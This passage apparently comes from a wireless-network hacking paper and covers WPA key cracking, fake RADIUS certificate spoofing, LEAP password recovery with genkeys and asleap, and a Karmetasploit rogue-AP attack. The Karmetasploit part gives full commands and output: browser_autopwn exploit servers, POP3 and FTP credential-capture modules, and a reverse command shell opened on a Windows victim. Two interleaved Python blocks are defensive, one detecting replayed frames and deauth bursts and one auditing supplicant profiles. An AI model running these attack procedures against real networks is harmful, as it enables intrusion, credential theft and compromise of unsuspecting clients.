A successful result looks like the following.
--------------------------------------------------------------------------------
Opening test-02.cap
Read 252 packets.
# BSSID ESSID Encryption
1 xx:xx:xx:xx:xx:xx Workshop WPA (1 handshake)
Choosing first network as target.
Opening workshop-02.cap
Reading packets, please wait...
Aircrack-ng 1.0 rc1 r1085
[00:00:00] 0 keys tested (0.00 k/s)
KEY FOUND! [ TheFuckinWPAKey ]
Master Key : 3C 57 0F 3A 55 E5 C5 27 8E 93 02 F2 F9 21 2C D4
E2 48 6C DF 59 8D 19 19 B5 F2 80 BE 81 15 10 63
Transcient Key : E3 91 AD 02 78 A5 51 DE 2A AE 15 25 DB 9B 4A F6
61 A7 42 D8 32 9B 48 37 01 80 0B A7 83 F9 67 B2
9B FE 47 EA 0A B8 E0 2D E0 81 6E BB 48 1F AA 86
2A 7E B0 F7 BE C8 2B 8F 14 DF AB 6F 58 28 8E E1
EAPOL HMAC : EC 94 29 B7 1F 1F 8E F7 25 78 E9 E1 C6 4E 51 3D
--------------------------------------------------------------------------------
From this result, the WPA-PSK/WPA2-PSK key is "TheFuckinWPAKey".
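The replayed ARP frame hexdumped in [0x05g] and the 64 directed deauthentication frames sent in this section are the two on-air artifacts of these procedures, and they are what a wireless IDS looks for. The Python below is an added example (not code from the paper or from aircrack-ng): it decodes the 802.11 header of the frame from the [0x05g] hexdump, then flags repeated (source, IV) pairs and deauthentication bursts in a constructed capture. The timestamps, thresholds and helper names are assumptions.

```python
import struct
from collections import Counter, defaultdict

# Forged ARP request exactly as hexdumped in section [0x05g] above (68 bytes).
FORGED_ARP = bytes.fromhex(
    "08410201001b2f3dcbd6002127c00771"
    "ffffffffffff800155bce6002e4ea334"
    "a2b3fc4abb8b24c426184f26fdf76c3b"
    "ef7a2a365dbb252c8c0c8764632d537e"
    "66bf700e"
)
AP_MAC = bytes.fromhex("001b2f3dcbd6")   # BSSID from the same hexdump
STA_MAC = bytes.fromhex("001a7337e2a3")  # client address seen in the [0x05d] dump


def mac(raw):
    return ":".join(f"{b:02x}" for b in raw)


def parse_frame(raw):
    """Decode the 24-byte 802.11 MAC header and, for a protected data frame,
    the 3-byte WEP IV that follows it. Four-address (WDS) frames are rejected."""
    if len(raw) < 24:
        raise ValueError("frame shorter than an 802.11 MAC header")
    fc0, fc1 = raw[0], raw[1]
    ftype, subtype = (fc0 >> 2) & 0x3, (fc0 >> 4) & 0xF   # 0 mgmt, 1 ctrl, 2 data
    to_ds, from_ds = bool(fc1 & 0x01), bool(fc1 & 0x02)
    protected = bool(fc1 & 0x40)                           # the "(WEP)" flag in the dumps
    a1, a2, a3 = raw[4:10], raw[10:16], raw[16:22]
    if to_ds and from_ds:
        raise ValueError("four-address frames are not handled in this example")
    if to_ds:            # station -> AP: Addr1 = BSSID, Addr2 = SA, Addr3 = DA
        bssid, src, dst = a1, a2, a3
    elif from_ds:        # AP -> station: Addr1 = DA, Addr2 = BSSID, Addr3 = SA
        dst, bssid, src = a1, a2, a3
    else:                # management / IBSS: Addr1 = DA, Addr2 = SA, Addr3 = BSSID
        dst, src, bssid = a1, a2, a3
    frame = {"type": ftype, "subtype": subtype, "to_ds": to_ds,
             "from_ds": from_ds, "protected": protected,
             "bssid": mac(bssid), "src": mac(src), "dst": mac(dst), "iv": None}
    if ftype == 2 and protected and len(raw) >= 28:
        frame["iv"] = raw[24:27].hex()          # the WEP IV travels in the clear
        frame["key_index"] = raw[27] >> 6
    return frame


def find_replayed_ivs(parsed, threshold=10):
    """A real station does not resend one encrypted frame over and over, but
    aireplay-ng -2/-3 does: count identical (source, IV) pairs."""
    seen = Counter((f["src"], f["iv"]) for _, f in parsed if f["iv"] is not None)
    return {pair: n for pair, n in seen.items() if n >= threshold}


def find_deauth_bursts(parsed, window_s=1.0, threshold=20):
    """Flag (bssid, victim) pairs hit by >= threshold deauthentication frames
    (management subtype 12) inside any window_s-second sliding window."""
    times = defaultdict(list)
    for ts, f in parsed:
        if f["type"] == 0 and f["subtype"] == 12:
            times[(f["bssid"], f["dst"])].append(ts)
    alerts = {}
    for pair, ts_list in times.items():
        ts_list.sort()
        start = 0
        for end, t in enumerate(ts_list):
            while t - ts_list[start] > window_s:
                start += 1
            count = end - start + 1
            if count >= threshold:
                alerts[pair] = max(alerts.get(pair, 0), count)
    return alerts


def deauth_frame(bssid, station, reason=7):
    """Minimal directed deauthentication frame, used only to build the sample capture."""
    header = bytes([0xC0, 0x00, 0x3A, 0x01]) + station + bssid + bssid + b"\x00\x00"
    return header + struct.pack("<H", reason)


def sample_capture():
    """Constructed capture (timestamps invented): 40 copies of the forged ARP
    frame, a 64-frame deauth burst like 'aireplay-ng -0 1', and one benign deauth."""
    cap = [(10.0 + i * 0.002, FORGED_ARP) for i in range(40)]
    cap += [(20.0 + i * 0.01, deauth_frame(AP_MAC, STA_MAC)) for i in range(64)]
    cap.append((3600.0, deauth_frame(AP_MAC, STA_MAC, reason=3)))
    return cap


def triage(capture):
    """capture: list of (timestamp, raw_frame_bytes). Returns both alert sets."""
    parsed = [(ts, parse_frame(raw)) for ts, raw in capture]
    return {"replayed_ivs": find_replayed_ivs(parsed),
            "deauth_bursts": find_deauth_bursts(parsed)}


if __name__ == "__main__":
    for kind, hits in triage(sample_capture()).items():
        for pair, n in hits.items():
            print(f"{kind}: {pair} x{n}")
```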
#############################################################
[0x08] - Exploiting Wireless Enterprise (WPA-TLS/TTLS/PEAP)
#############################################################
Most companies have turned to public key encryption for their wireless networks and think that
it is perfectly safe. But a tricky hacker can still attack this setup by spoofing the certificate.
This attack takes advantage of client carelessness: many clients accept a certificate
without considering whether it is genuine. This lets the attacker impersonate
the RADIUS server and log the credentials of the victims.
We can use FreeRADIUS as the fake RADIUS server, combined with the WPE patch, to enable logging of credential
information on the FreeRADIUS server.
Additional information: http://www.willhackforsushi.com/FreeRADIUS_WPE.html
################################
[0x09] - Exploiting CISCO LEAP
################################
Cisco proprietary Lightweight Extensible Authentication Protocol (LEAP) wireless authentication process helps eliminate se
by supporting centralized, user-based authentication and the ability to generate dynamic WEP keys. Cisco LEAP is one of the extens
types specified by 802.1X.
LEAP is easy to implement and offers compelling features such as:
- Mutual Authentication
- User-Based Authentication
- Dynamic WEP Keys
We found that the username sent to RADIUS is plaintext, as captured with Wireshark, but the password was encrypted, so it's also V
asleap is a tool designed to recover weak LEAP (Cisco's Lightweight Extensible Authentication Protocol) and PPTP passwords
- Weak LEAP and PPTP password recovery from pcap and AiroPeek files or from live capture
- Deauthentication of clients on a LEAP WLAN (speeding up LEAP password recovery); AirJack driver required
Download Here: http://asleap.sourceforge.net/
First step: use genkeys (shipped with asleap) to produce the necessary database (.dat) and index (.idx) files
#./genkeys -r dict -f dict.dat -n dict.idx
dict = Our wordlist/dictionary file, with one word per line
dict.dat = Our new output pass+hash file (generated as a result of running this command)
dict.idx = Our new output index filename (generated as a result of running this command)
#./genkeys -r dictionary -f dict.dat -n dict.idx
-----------------------------------------------------------------------
genkeys 1.4 - generates lookup file for asleap. <jwright@hasborg.com>
Generating hashes for passwords (this may take some time) ...Done.
3 hashes written in 0.2 seconds: 122.67 hashes/second
Starting sort (be patient) ...Done.
Completed sort in 0 compares.
Creating index file (almost finished) ...Done.
-----------------------------------------------------------------------
The final step in recovering our weak LEAP password is to run the asleap command with our newly created .dat and .idx file
#./asleap -r data/leap.dump -f dict.dat -n dict.idx
leap.dump = Our libpcap packet capture file (NOTE: Any libpcap (e.g. tcpdump, Wireshark) or AiroPeek capture file (.apc) c
dict.dat = Our output pass+hash file (generated with genkeys, see above)
dict.idx = Our new output index filename (generated with genkeys, see above)
#./asleap -r data/leap.dump -f dict.dat -n dict.idx
-----------------------------------------------------------------------
asleap 1.4 - actively recover LEAP/PPTP passwords. <jwright@hasborg.com>
Using the passive attack method.
Captured LEAP exchange information:
username: qa_leap
challenge: 0786aea0215bc30a
response: 7f6a14f11eeb980fda11bf83a142a8744f00683ad5bc5cb6
hash bytes: 4a39
NT hash: a1fc198bdbf5833a56fb40cdd1a64a39
password: qaleap
Closing pcap ...
-----------------------------------------------------------------------
Notice: the success rate depends on the dictionary size
Now asleap 2.2, which includes the "-C" and "-R" options to specify the hex-delimited bytes for the challenge an
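The client-side mistakes behind [0x08] (accepting any RADIUS server certificate) and [0x09] (relying on LEAP) both show up in the supplicant profile, so they can be audited before an attacker ever appears. The Python below is an added example, not from the paper: it parses wpa_supplicant-style network blocks and reports profiles that lack a pinned CA, lack a server-name match, or use LEAP. The two profiles, the certificate path and the domain name are constructed placeholders; the option names are the real wpa_supplicant ones.

```python
import re

# wpa_supplicant options that tie the TLS tunnel to a specific RADIUS server.
NAME_CHECKS = ("domain_suffix_match", "domain_match", "altsubject_match", "subject_match")

# Constructed profiles for this example; credentials, paths and names are placeholders.
WEAK_PROFILE = """
network={
    ssid="Workshop-Corp"
    key_mgmt=WPA-EAP
    eap=PEAP
    identity="alice"
    password="example-only"
    phase2="auth=MSCHAPV2"
}
network={
    ssid="Workshop-Legacy"
    key_mgmt=WPA-EAP
    eap=LEAP
    identity="bob"
    password="example-only"
}
"""

HARDENED_PROFILE = """
network={
    ssid="Workshop-Corp"
    key_mgmt=WPA-EAP
    eap=PEAP
    identity="alice"
    password="example-only"
    ca_cert="/etc/ssl/certs/corp-radius-ca.pem"
    domain_suffix_match="radius.example.com"
    phase2="auth=MSCHAPV2"
}
"""


def parse_networks(text):
    """Return one dict per network={...} block; surrounding quotes are stripped."""
    nets = []
    for body in re.findall(r"network\s*=\s*\{(.*?)\}", text, re.S):
        net = {}
        for line in body.splitlines():
            line = line.split("#", 1)[0].strip()      # drop blank and comment lines
            if "=" in line:
                key, value = line.split("=", 1)       # phase2="auth=..." keeps its inner '='
                net[key.strip()] = value.strip().strip('"')
        nets.append(net)
    return nets


def audit_network(net):
    """Findings for one block; an empty list means the client verifies the server."""
    if net.get("key_mgmt", "").upper() != "WPA-EAP":
        return []                                 # PSK/open networks are out of scope here
    ssid = net.get("ssid", "<no ssid>")
    if net.get("eap", "").upper() == "LEAP":      # no TLS tunnel at all, see [0x09]
        return [f"{ssid}: eap=LEAP, the captured challenge/response can be dictionary-attacked offline"]
    findings = []
    if not net.get("ca_cert"):
        findings.append(f"{ssid}: no ca_cert, so any RADIUS server certificate is accepted")
    if not any(net.get(k) for k in NAME_CHECKS):
        findings.append(f"{ssid}: no server-name match, so any certificate from the trusted CA is accepted")
    return findings


def audit_config(text):
    """Audit every network block in a wpa_supplicant-style configuration string."""
    return [finding for net in parse_networks(text) for finding in audit_network(net)]


if __name__ == "__main__":
    for label, profile in (("weak", WEAK_PROFILE), ("hardened", HARDENED_PROFILE)):
        print(label, audit_config(profile) or ["OK"])
```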
##########################################
[0x10] - Mass Exploit with Karmetasploit
##########################################
HD Moore released some documentation (http://trac.metasploit.com/wiki/Karmetasploit) to get Karmetasploit working with the
Karmetasploit can launch a fake AP and exploit the clients that connect to it. The attacker can log cookies, FTP, HTTP, cre
of the client and also exploit browser vulnerabilities on the client machine.
This method was tested in BackTrack 3 (Final).
1. Update Aircrack-NG
$ svn co http://trac.aircrack-ng.org/svn/trunk/ aircrack-ng
$ make
# make install
2. Let's run the aireplay-ng injection test to see if things are working (your Wi-Fi card must support packet injection)
bt# aireplay-ng -9 wlan0
15:10:21 Trying broadcast probe requests...
15:10:21 Injection is working!
15:10:25 Found 5 APs
15:10:25 Trying directed probe requests...
15:10:26 00:1E:58:33:83:71 - channel: 2 - 'CITEC'
15:10:35 0/30: 0%
15:10:37 00:14:06:11:42:A2 - channel: 6 - 'WORKSHOP'
15:10:42 0/30: 0%
15:10:42 00:13:19:5F:D1:D0 - channel: 11 - 'VICTIM'
15:10:48 Ping (min/avg/max): 3.325ms/126.125ms/201.281ms Power: 83.27
15:10:48 5/30: 60%
15:10:48 Injection is working!
15:56:48 00:14:06:11:42:A0 - channel: 11 - 'Mywifi'
15:56:53 0/30: 0%
Now injection works!
3. Update Metasploit
$ svn co http://metasploit.com/svn/framework3/trunk msf3
4. Download the bash script from http://www.darkoperator.com/kmsapng.tgz
The script will do the following:
- Change the MAC address of the interface
- Set the interface to monitor mode
- Start the Karma AP with airbase-ng
- Change the MTU size of the interface
- Set the IP
- Start the DHCPD server
- Set up an iptables redirect of all traffic to itself so as to bypass cached DNS entries
- Start Metasploit.
5. After that we run kmsapng.sh like this:
#./kmsapng.sh -i wlan0 -m km -s linksys
Changing MAC Address
Current MAC: 00:0f:c1:08:12:91 (Wave Corporation)
Faked MAC: 00:40:1b:5b:b0:0b (Printer Systems Corp.)
starting fake ap
This will take 15 seconds ..............
DHCPD started successfully
Starting Packet capture to /root/kms.cap
Starting Metasploit
=[ msf v3.2-release
+ -- --=[ 304 exploits - 124 payloads
+ -- --=[ 18 encoders - 6 nops
=[ 79 aux
resource> load db_sqlite3
[*] Successfully loaded plugin: db_sqlite3
resource> db_create /root/karma.db
[*] The specified database already exists, connecting
[*] Successfully connected to the database
[*] File: /root/karma.db
resource> use auxiliary/server/browser_autopwn
resource> setg AUTOPWN_HOST 172.16.1.207
AUTOPWN_HOST => 172.16.1.207
resource> setg AUTOPWN_PORT 55550
AUTOPWN_PORT => 55550
resource> setg AUTOPWN_URI /ads
AUTOPWN_URI => /ads
resource> set LHOST 172.16.1.207
LHOST => 172.16.1.207
resource> set LPORT 45000
LPORT => 45000
resource> set SRVPORT 55550
SRVPORT => 55550
resource> set URIPATH /ads
URIPATH => /ads
resource> run
[*] Starting exploit modules on host 172.16.1.207...
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:55550/exploit/multi/browser/mozilla_compareto
[*] Local IP: http://127.0.0.1:55550/exploit/multi/browser/mozilla_compareto
[*] Server started.
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:55550/exploit/multi/browser/mozilla_navigatorjava
[*] Local IP: http://127.0.0.1:55550/exploit/multi/browser/mozilla_navigatorjava
[*] Server started.
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:55550/exploit/multi/browser/firefox_queryinterface
[*] Local IP: http://127.0.0.1:55550/exploit/multi/browser/firefox_queryinterface
[*] Server started.
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:55550/exploit/windows/browser/apple_quicktime_rtsp
[*] Local IP: http://127.0.0.1:55550/exploit/windows/browser/apple_quicktime_rtsp
[*] Server started.
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:55550/exploit/windows/browser/novelliprint_getdriversettings
[*] Local IP: http://127.0.0.1:55550/exploit/windows/browser/novelliprint_getdriversettings
[*] Server started.
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:55550/exploit/windows/browser/ms03_020_ie_objecttype
[*] Local IP: http://127.0.0.1:55550/exploit/windows/browser/ms03_020_ie_objecttype
[*] Server started.
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:55550/exploit/windows/browser/ie_createobject
[*] Local IP: http://127.0.0.1:55550/exploit/windows/browser/ie_createobject
[*] Server started.
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:55550/exploit/windows/browser/ms06_067_keyframe
[*] Local IP: http://127.0.0.1:55550/exploit/windows/browser/ms06_067_keyframe
[*] Server started.
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:55550/exploit/windows/browser/ms06_071_xml_core
[*] Local IP: http://127.0.0.1:55550/exploit/windows/browser/ms06_071_xml_core
[*] Server started.
[*] Started reverse handler
[*] Server started.
[*] Using URL: http://0.0.0.0:55550/ads
[*] Local IP: http://127.0.0.1:55550/ads
[*] Server started.
[*] Auxiliary module running as background job
resource> use auxiliary/server/capture/pop3
resource> set SRVPORT 110
SRVPORT => 110
resource> set SSL false
SSL => false
resource> run
[*] Server started.
[*] Auxiliary module running as background job
resource> use auxiliary/server/capture/pop3
resource> set SRVPORT 995
SRVPORT => 995
resource> set SSL true
SSL => true
resource> run
[*] Server started.
[*] Auxiliary module running as background job
resource> use auxiliary/server/capture/ftp
resource> run
[*] Server started.
...
...
[*] Sending Firefox location.QueryInterface() Code Execution to 10.0.0.252:1493...
[*] Command shell session 2 opened (10.0.0.1:45001 -> 10.0.0.252:1507)
msf auxiliary(http) > sessions -i 2
[*] Starting interaction with 2...
Microsoft Windows XP [Vesion 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
D:\Mozilla Firefox> cd ..
D:\>net user
User accounts for CWH
-------------------------------------------------------------------------------
__vmware_user__ Administrator ASPNET
Guest HelpAssistant IUSR_CWH
IWAM_CWH CWH SUPPORT_388945a0
The command completed successfully.
Enjoy the pwnage!! Oops, for pentest :p